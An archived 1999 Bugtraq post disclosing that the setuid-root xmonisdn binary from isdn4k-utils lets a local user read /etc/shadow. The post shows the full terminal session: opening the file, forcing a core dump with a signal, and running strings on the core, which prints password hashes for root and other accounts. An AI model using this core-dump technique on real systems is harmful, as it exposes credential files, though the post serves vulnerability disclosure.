Bugtraq mailing list archives
xmonisdn (isdn4k-utils/Linux) bug report
From: ronvdaal () SYNTONIC NET (Ron van Daal)
Date: Tue, 19 Oct 1999 02:44:04 +0200
Hello, While playing with xmonisdn (included in the isdn4k-utils package), I discovered a little bug. I didn't find anything regarding xmonisdn in the Bugtraq archives, so here's a quick post. I'm wondering if other xmonisdn users can reproduce this exploit. (Tested on my workstation, which is running Red Hat Linux 6.0) [[syntonix@damien bin]# pwd; ls -al xmonisdn /usr/bin -rwsr-xr-x 1 root root 13528 Mar 4 1998 xmonisdn [[syntonix@damien bin]# xmonisdn -file /etc/shadow Warning: Cannot convert string "netactive" to type Pixmap Warning: Cannot convert string "netactiveout" to type Pixmap Warning: Cannot convert string "netwaiting" to type Pixmap Warning: Cannot convert string "netinactive" to type Pixmap Warning: Cannot convert string "netstart" to type Pixmap Warning: Cannot convert string "netstop" to type Pixmap [1]+ Stopped xmonisdn -file /etc/shadow [[syntonix@damien bin]# bg [1]+ xmonisdn -file /etc/shadow & [[syntonix@damien bin]# killall -8 xmonisdn [1]+ Floating point exception(core dumped) xmonisdn -file /etc/shadow [[syntonix@damien bin]# strings core|less <snip> /lib/ld-linux.so.2 root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500 bin:*:10878:0:99999:7::: daemon:*:10878:0:99999:7::: adm:*:10878:0:99999:7::: lp:*:10878:0:99999:7::: sync:*:10878:0:99999:7::: shutdown:*:10878:0:99999:7::: halt:*:10878:0:99999:7::: mail:*:10878:0:99999:7::: news:*:10878:0:99999:7::: uucp:*:10878:0:99999:7::: operator:*:10878:0:99999:7::: games:*:10878:0:99999:7::: gopher:*:10878:0:99999:7::: ftp:*:10878:0:99999:7::: nobody:*:10878:0:99999:7::: xfs:!!:10878:0:99999:7::: ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492 syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484 <snip> -- Ron van Daal | Syntonic Internet | tel. +31(0)46-4230738 ronvdaal () syntonic net | www.syntonic.net | fax. +31(0)46-4230739
Current thread:
- Re: execve bug linux-2.2.12, (continued)
- Re: execve bug linux-2.2.12 Matt Chapman (Oct 18)
- Re: execve bug linux-2.2.12 Taneli Huuskonen (Oct 19)
- Re: execve bug linux-2.2.12 Alan Cox (Oct 20)
- Microsoft Security Bulletin (MS99-044) Aleph One (Oct 20)
- Re: execve bug linux-2.2.12 Timo Felbinger (Oct 20)
- CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Aleph One (Oct 20)
- Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Richard Trott (Oct 20)
- Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Chad Price (Oct 21)
- Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Gregory A Lundberg (Oct 21)
- Remote DoS in Axent's Raptor 6.0 Mike Frantzen (Oct 20)
- xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 18)
- Re: xmonisdn (isdn4k-utils/Linux) bug report Jan-Hendrik Terstegge (Oct 20)
- Last weeks release: whisker (new web scanner) rfp () WIRETRIP NET (Oct 20)
- Re: xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 20)
- Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication Olaf Selke (Oct 20)
- DoS in Eicon ISDN Modem is now fixed Aviram Jenik (Oct 20)
- Re: Microsoft Security Bulletin (MS99-043) David Schwartz (Oct 18)